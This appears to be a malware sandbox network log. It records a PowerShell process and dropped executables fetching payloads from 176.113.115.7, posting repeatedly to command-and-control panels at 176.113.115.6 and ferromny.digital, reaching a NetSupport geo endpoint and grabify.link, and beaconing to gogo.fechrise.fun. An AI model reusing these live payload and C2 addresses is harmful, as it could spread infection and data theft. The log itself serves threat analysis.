Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 4784128-5046271/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=5505024-5606383
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 101360
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 5505024-5606383/5606384
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6876
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="92697374996b958a"
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-chl-out: GT8hxy8UN7NhcGOgEne7uhNOIKpjd7+KI1wVTcnUgQCaqNvx9wHrP9NaiHy0sP5qNEZ80VqofHk53rwQPUasARhZkJpvyr8SxPRXEg7E8pld1ipTi9elzhQiARrHjciPN20NOdk25EGOE+Vk5Bm4Eg==$X4ODJwpIvIeePk8KL9vzYg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBTF8n0Vh0c71DvgHun6K0a4AWsgFqga9Et%2BXWrDQOXOQIBKDdWuAym2on83IFkEwFvebltmB4zMwucgb7e9TSUhuH4QSYlbm2jNiZmRNrc9pIm6OONmF%2BGuUdbTEw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 92697374996b958a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50545&min_rtt=42818&rtt_var=22988&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3286&recv_bytes=507&delivery_rate=65995&cwnd=253&unsent_bytes=0&cid=09ef1e059de5c3cc&ts=166&x=0"
DNS

devbuilds.s.kaspersky-labs.com

Request

devbuilds.s.kaspersky-labs.com

IN A

Response

devbuilds.s.kaspersky-labs.com

IN CNAME

edge.geo.kaspersky.com

edge.geo.kaspersky.com

IN A

212.73.221.196

edge.geo.kaspersky.com

IN A

80.231.123.135

edge.geo.kaspersky.com

IN A

80.239.174.35
GET

http://176.113.115.7/files/5163778194/7IIl2eE.exe

Request

GET /files/5163778194/7IIl2eE.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:38:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 03:27:42 GMT
ETag: "1290e9-631366b83351c"
Accept-Ranges: bytes
Content-Length: 1216745
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/1229664666/BIm18E9.exe

Request

GET /files/1229664666/BIm18E9.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:38:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 12:59:43 GMT
ETag: "4eaf28-6313e6942cc31"
Accept-Ranges: bytes
Content-Length: 5156648
Content-Type: application/x-msdos-program
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6876
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="926973958e9394f6"
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-chl-out: nd46jrs+4gHOz8dfxNtu8F5C2sw8Ea6vl3Y7JnsItQOmASwWKIFKBtI+gig2XkY7/sE+VdaDlkKFgxOve0YlOPyECEGgQukoJ0L0HiFRE3xGWpXRAKFa8Hr1Btt/svUhvc6SXLDF+fcuWQMzsGwQNg==$ICBiX1G7ifiqfkQzHPXdJQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mqfnl3crNJhSI7B3fU4olB1rXy3h44%2FXXsR1a6lGJhyvZPbw7vCockiuMuwh8ZJUXjU12HmidbOdfhhEmvXvpKR429yYF1y2wxW6AGm4n3N1ia9f0Pe3cP5akCRqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926973958e9394f6-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54941&min_rtt=47563&rtt_var=16045&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3287&recv_bytes=507&delivery_rate=82405&cwnd=253&unsent_bytes=0&cid=e650dc9dfceb82ba&ts=115&x=0"
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6876
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="926973b71b1663d1"
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-chl-out: joGfnHoygRz3x8rVcCtqCHLRIvvw5+OFb1I9ehTU8vQ3ejdxI79JAF4NZimmne31rwDgayfKr4+MM7e/NWNiWq1FTWyhqfPK3hu4i0Rg78/V87dfut/NW2zGwyUl2iy1H6QiryqCeH6n5WmSuB0Yog==$ZlmK4rGze00MUxuoTNnt0A==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTZWNe3%2Fb29MC%2FcWE8vrMmEAUsGZNKM1ocedorTuDZZWBhxBQSCqX%2BUT09e7H5Tyk%2FZH732aPSo35kcKa5XwvfvCxFFJCFZKov%2BUU3F9eLyy7K42PlXpIRKhaFvw3g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926973b71b1663d1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=57262&min_rtt=42555&rtt_var=33926&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3286&recv_bytes=507&delivery_rate=63776&cwnd=253&unsent_bytes=0&cid=7b5f301159a6896d&ts=221&x=0"
DNS

TRnueDLgiwI.TRnueDLgiwI

Request

TRnueDLgiwI.TRnueDLgiwI

IN A

Response
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6854
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="926973d8ba5a49a9"
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-chl-out: 2rluXvRx8OlPhoyCSp8W8JweAejbqyo7dNCj4bYXsABYPcVkrSdoI1Nc86ou8gqNCy5SE8gf/KiLbyaD+8VUnlLCTbgafK1nqh/ealdQtmgzT1r7U6vtmUf4LlgHeDphbgsT8lEhT0rJz0kM0kTDdg==$NeihciZu2Mh98DWvXIDqDA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fw%2FxZs2HsdkPh%2FGknMncppiyMX8ufTPYOYQU7wU1R1Dpneo%2B67ZY64IdeHGApplVQzUpZgUQaSP2ludxsuj1fmdsGQXukh9ATbUsPhb76CpuSlc99FEQSpYuFPikA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926973d8ba5a49a9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46144&min_rtt=43949&rtt_var=12158&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3286&recv_bytes=507&delivery_rate=84240&cwnd=253&unsent_bytes=0&cid=02caa636c6457859&ts=113&x=0"
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6876
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="926973f9cf88ed0b"
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-chl-out: bguGUVaDJneVOlihYx5PGZXeje3L7LqJjvFWmVFNITum4BucBBELl8JGkgI2hwe6ITkZK7i7Alqa1wqecsngH4V444TebXHm+IpviXTuOiKF6rMYcH4b61L4Kw5Fd+G/vmOHdl+4FKSrrQuBJRlUaA==$t2PnlpVqyIYDynabSKWjFA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3kvRXGgl4aXYygnF7oiCTdSUoFbqHMfWRwSjm7vtWPD7Y8NprUIbdnoF9YDR3lkmfSviZOGGemn%2BmrC4NxgWgOWNQ5FEWiOXLp6yPd%2F%2B1eBGrL1nSjRcg7rhghvrw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926973f9cf88ed0b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48683&min_rtt=43415&rtt_var=17222&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3286&recv_bytes=507&delivery_rate=69520&cwnd=251&unsent_bytes=0&cid=d8c88c7f97c3a7b4&ts=132&x=0"
DNS

advennture.top

Request

advennture.top

IN A

Response

advennture.top

IN A

172.67.221.138

advennture.top

IN A

104.21.25.9
POST

https://advennture.top/GKsiio

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 59
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:38:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wd0MfXMLfMsmrQSyL0hiLRDG9salSjDgFGgV%2BE%2FuDGMdUWmF3xmiryM%2Fl%2Bzt9zfceXYTS6nOVaKtRQ6ZdLurz5Jg5x36XP3VGK7fFEZSpd9RYnXkXjY3Dpu5QyRwE%2Fe6Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926974000879bd80-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49025&min_rtt=44780&rtt_var=16468&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=656&delivery_rate=66572&cwnd=253&unsent_bytes=0&cid=b4685c8f99aba6ba&ts=295&x=0"
POST

https://advennture.top/GKsiio

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2hM9rjKn6v9n7Ex82I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1623
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:38:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN%2B2Ac57XG9lGlw7pX9%2Fjp6sjSpDn9o9t0lLA2aZm0Wne0LEb%2FJFmE3jaPMnhR%2BUuZpQkHA9UOgDLF7NvkZUiVTiLTLAtwfHO3%2BDcyeD02i7AEJVgxXi09BAack5FdJf5w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926974027c03bd80-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48219&min_rtt=42532&rtt_var=13964&sent=10&recv=11&lost=0&retrans=0&sent_bytes=4246&recv_bytes=2619&delivery_rate=66572&cwnd=255&unsent_bytes=0&cid=b4685c8f99aba6ba&ts=597&x=0"

176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

powershell.exe

59.4kB
1.9MB
1110
1398

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

tls, http2

2.0kB
9.4kB
21
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

HTTP Response

204
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

99.7kB
2.9MB
2097
2091

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388157_1F8FN0PPBBGQ5O2YF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388158_1XCR56DJ2GD9T3UQ1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
176.113.115.6:80

http://176.113.115.6/Ni9kiput/index.php

http

rapes.exe

4.3kB
6.1kB
33
25

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/151334531/dBSGwVB.exe

http

rapes.exe

502.2kB
14.1MB
10107
10098

HTTP Request

GET http://176.113.115.7/files/151334531/dBSGwVB.exe

HTTP Response

200
108.61.198.38:443

http

bild.exe

1.8kB
785 B
8
6
104.26.1.231:80

http://geo.netsupportsoftware.com/location/loca.asp

http

bild.exe

440 B
1.3kB
7
5

HTTP Request

GET http://geo.netsupportsoftware.com/location/loca.asp

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/2043702969/kZZeUXM.exe

http

rapes.exe

634.7kB
19.0MB
13624
13618

HTTP Request

GET http://176.113.115.7/files/887739535/kDveTWY.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/6629342726/oalJJxv.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/2043702969/kZZeUXM.exe

HTTP Response

200
104.21.64.1:443

https://ferromny.digital/gwpd

tls, http

MSBuild.exe

3.2kB
5.7kB
14
13

HTTP Request

POST https://ferromny.digital/gwpd

HTTP Response

200

HTTP Request

POST https://ferromny.digital/gwpd

HTTP Response

200
104.21.64.1:443

https://ferromny.digital/gwpd

tls, http

MSBuild.exe

2.1kB
4.1kB
10
10

HTTP Request

POST https://ferromny.digital/gwpd

HTTP Response

200
104.21.64.1:443

https://ferromny.digital/gwpd

tls, http

MSBuild.exe

1.2kB
4.6kB
11
9

HTTP Request

POST https://ferromny.digital/gwpd

HTTP Response

200
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
236 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
184 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
224 B
6
5
